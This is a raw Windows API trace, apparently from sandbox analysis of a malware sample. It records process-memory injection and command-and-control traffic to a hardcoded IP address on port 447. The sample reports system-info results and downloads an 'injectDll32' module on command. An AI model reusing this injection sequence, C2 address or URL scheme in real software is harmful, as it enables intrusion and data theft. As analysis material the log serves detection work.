	[0155.177] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.177] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128388, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0155.177] VirtualFreeEx (hProcess=0x494, lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.178] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.178] lstrlenA (lpString="GetSystemInfo") returned 13
	[0155.178] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.178] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x22ad390*, nSize=0xe, lpNumberOfBytesWritten=0x128a78 | out: lpBuffer=0x22ad390*, lpNumberOfBytesWritten=0x128a78*=0xe) returned 1
	[0155.178] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.178] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x128ef4*, nSize=0x400, lpNumberOfBytesWritten=0x128a78 | out: lpBuffer=0x128ef4*, lpNumberOfBytesWritten=0x128a78*=0x400) returned 1
	[0155.179] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x100000
	[0155.179] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100000, lpBuffer=0x128e74*, nSize=0x80, lpNumberOfBytesWritten=0x128a78 | out: lpBuffer=0x128e74*, lpNumberOfBytesWritten=0x128a78*=0x80) returned 1
	[0155.179] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x350000
	[0155.179] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x1289f8, nSize=0x70, lpNumberOfBytesRead=0x1289d8 | out: lpBuffer=0x1289f8*, lpNumberOfBytesRead=0x1289d8*=0x70) returned 1
	[0155.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ee0
	[0155.179] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x40) returned 0x370000
	[0155.179] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x370000, lpBuffer=0x22a5ee0*, nSize=0x2c, lpNumberOfBytesWritten=0x1289d0 | out: lpBuffer=0x22a5ee0*, lpNumberOfBytesWritten=0x1289d0*=0x2c) returned 1
	[0155.180] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x1289f8*, nSize=0x70, lpNumberOfBytesWritten=0x1289d0 | out: lpBuffer=0x1289f8*, lpNumberOfBytesWritten=0x1289d0*=0x70) returned 1
	[0155.180] ResetEvent (hEvent=0x488) returned 1
	[0155.180] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x102
	[0185.189] GetExitCodeThread (in: hThread=0x490, lpExitCode=0x1289dc | out: lpExitCode=0x1289dc) returned 1
	[0185.189] VirtualFreeEx (hProcess=0x494, lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 0
	[0185.189] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ee0) returned 1
	[0185.189] VirtualFreeEx (hProcess=0x494, lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 0
	[0185.189] VirtualFreeEx (hProcess=0x494, lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 0
	[0185.190] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 0
	[0185.190] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d70
	[0185.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0185.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0185.190] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0185.190] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310cd0
	[0185.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0185.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307898) returned 1
	[0185.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad390) returned 1
	[0185.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad228) returned 1
	[0185.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad000) returned 1
	[0185.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2283220) returned 1
	[0185.191] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x2283220
	[0185.191] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0185.192] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0185.192] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/10/62/IXKVFUGWKW/7/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0185.192] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128aec, dwBufferLength=0x4) returned 1
	[0185.193] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0185.432] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0185.432] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128adc, lpdwBufferLength=0x128ad8, lpdwIndex=0x0 | out: lpBuffer=0x128adc*, lpdwBufferLength=0x128ad8*=0x4, lpdwIndex=0x0) returned 1
	[0185.432] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0185.433] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307960
	[0185.433] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d20
	[0185.433] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x60) returned 0x2262150
	[0185.433] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2283220) returned 1
	[0185.433] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ee0
	[0185.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x771d0000
	[0185.433] GetProcAddress (hModule=0x771d0000, lpProcName="UrlEscapeW") returned 0x771e8ca7
	[0185.434] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x22ebba0
	[0185.434] UrlEscapeW (in: pszUrl="systeminfo", pszEscaped=0x22ebba0, pcchEscaped=0x128a70, dwFlags=0x0 | out: pszEscaped="systeminfo", pcchEscaped=0x128a70) returned 0x0
	[0185.434] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x26d910
	[0185.434] UrlEscapeW (in: pszUrl="GetSystemInfo Control failed", pszEscaped=0x26d910, pcchEscaped=0x128a70, dwFlags=0x0 | out: pszEscaped="GetSystemInfo%20Control%20failed", pcchEscaped=0x128a70) returned 0x0
	[0185.434] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x800) returned 0x22eaf60
	[0185.434] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0185.434] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0185.434] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/14/systeminfo/GetSystemInfo%20Control%20failed/0/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0185.434] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128a7c, dwBufferLength=0x4) returned 1
	[0185.434] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0186.777] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0186.777] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128a6c, lpdwBufferLength=0x128a68, lpdwIndex=0x0 | out: lpBuffer=0x128a6c*, lpdwBufferLength=0x128a68*=0x4, lpdwIndex=0x0) returned 1
	[0186.777] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22eaf60) returned 1
	[0186.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ebba0) returned 1
	[0186.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26d910) returned 1
	[0186.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0186.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307d20) returned 1
	[0186.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307960) returned 1
	[0186.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2262150) returned 1
	[0186.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0186.778] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2e8
	[0186.778] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2282848, Size=0x20) returned 0x2307960
	[0186.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ee0) returned 1
	[0186.778] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ee0
	[0186.779] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d20
	[0186.779] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5f50) returned 1
	[0186.779] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad318) returned 1
	[0186.779] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a79a8) returned 1
	[0186.779] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6db0) returned 1
	[0186.779] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307870) returned 1
	[0186.779] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6df8) returned 1
	[0186.779] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5f50
	[0186.779] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad318
	[0186.779] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x22a79a8
	[0186.780] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307870
	[0186.780] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0186.780] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0186.780] StrStrIW (lpFirst="injectDll sTart", lpSrch=" ") returned=" sTart"
	[0186.780] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad378
	[0186.780] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307898
	[0186.780] lstrcpynW (in: lpString1=0x2307898, lpString2="injectDll sTart", iMaxLength=10 | out: lpString1="injectDll") returned="injectDll"
	[0186.781] StrStrIW (lpFirst="sTart", lpSrch=" ") returned 0x0
	[0186.781] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad378, Size=0x10) returned 0x22ad000
	[0186.781] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad378
	[0186.781] lstrcpynW (in: lpString1=0x22ad378, lpString2="sTart", iMaxLength=6 | out: lpString1="sTart") returned="sTart"
	[0186.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sTart", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
	[0186.781] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad228
	[0186.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sTart", cchWideChar=-1, lpMultiByteStr=0x22ad228, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sTart", lpUsedDefaultChar=0x0) returned 6
	[0186.781] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0186.781] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0186.781] lstrcmpiW (lpString1="sTart", lpString2="start") returned 0
	[0186.781] lstrcmpiW (lpString1="sTart", lpString2="release") returned 1
	[0186.781] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0186.782] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0186.782] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0186.782] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x279a30
	[0186.782] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x279a30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0186.782] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32")) returned 0xffffffff
	[0186.783] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x279a30) returned 1
	[0186.783] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c4dc0
	[0186.783] WinHttpConnect (hSession=0x22c4dc0, pswzServerName="5.188.108.22", nServerPort=0x1bf, dwReserved=0x0) returned 0x22c4ea8
	[0186.784] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d20
	[0186.784] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6db0
	[0186.784] WinHttpSetTimeouts (hInternet=0x22c4dc0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0186.784] WinHttpOpenRequest (hConnect=0x22c4ea8, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/injectDll32/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x22bb5e0
	[0186.784] WinHttpSetOption (hInternet=0x22bb5e0, dwOption=0x1f, lpBuffer=0x128240, dwBufferLength=0x4) returned 1
	[0186.784] WinHttpSendRequest (hRequest=0x22bb5e0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0187.036] WinHttpReceiveResponse (hRequest=0x22bb5e0, lpReserved=0x0) returned 1
	[0187.036] WinHttpQueryHeaders (in: hRequest=0x22bb5e0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128230, lpdwBufferLength=0x12822c, lpdwIndex=0x0 | out: lpBuffer=0x128230*, lpdwBufferLength=0x12822c*=0x4, lpdwIndex=0x0) returned 1
	[0187.037] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0xee3) returned 1
	[0187.037] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xef0) returned 0x272c4c8
	[0187.037] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x272c4c8, dwNumberOfBytesToRead=0xee3, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x272c4c8*, lpdwNumberOfBytesRead=0x12822c*=0xee3) returned 1
	[0187.037] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.038] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x272c4c8, Size=0x2ef0) returned 0x272c4c8
	[0187.038] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x272d3ab, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x272d3ab*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.038] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x101c) returned 1
	[0187.040] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x272c4c8, Size=0x3f00) returned 0x272c4c8
	[0187.040] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x272f3ab, dwNumberOfBytesToRead=0x101c, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x272f3ab*, lpdwNumberOfBytesRead=0x12822c*=0x101c) returned 1
	[0187.040] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.040] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x272c4c8, Size=0x5f00) returned 0x26c8c38
	[0187.040] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26ccb37, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26ccb37*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.041] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.041] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26c8c38, Size=0x7f00) returned 0x26c8c38
	[0187.042] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26ceb37, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26ceb37*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.042] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.073] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26c8c38, Size=0x9f00) returned 0x26c8c38
	[0187.074] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26d0b37, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26d0b37*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.075] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.076] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26c8c38, Size=0xbf00) returned 0x26c8c38
	[0187.076] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26d2b37, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26d2b37*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.076] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.076] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26c8c38, Size=0xdf00) returned 0x2690048
	[0187.077] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x269bf47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x269bf47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.077] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.077] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0xff00) returned 0x2690048
	[0187.077] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x269df47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x269df47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.078] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.078] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x11f00) returned 0x2690048
	[0187.078] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x269ff47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x269ff47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.078] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.079] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x13f00) returned 0x2690048
	[0187.079] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26a1f47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26a1f47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.079] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.079] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x15f00) returned 0x2690048
	[0187.079] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26a3f47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26a3f47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.079] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.086] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x17f00) returned 0x2690048
	[0187.086] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26a5f47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26a5f47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.086] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.110] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x19f00) returned 0x2690048
	[0187.110] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26a7f47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26a7f47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.110] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.111] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x1bf00) returned 0x2690048
	[0187.111] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26a9f47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26a9f47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.111] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.111] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x1df00) returned 0x2690048
	[0187.111] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26abf47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26abf47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.111] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.112] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x1ff00) returned 0x2690048
	[0187.112] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26adf47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26adf47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.112] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.146] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x21f00) returned 0x2690048
	[0187.147] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26aff47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26aff47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.148] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.150] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x23f00) returned 0x2690048
	[0187.151] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26b1f47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26b1f47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.151] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.152] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x25f00) returned 0x2690048
	[0187.152] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x26b3f47, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x26b3f47*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
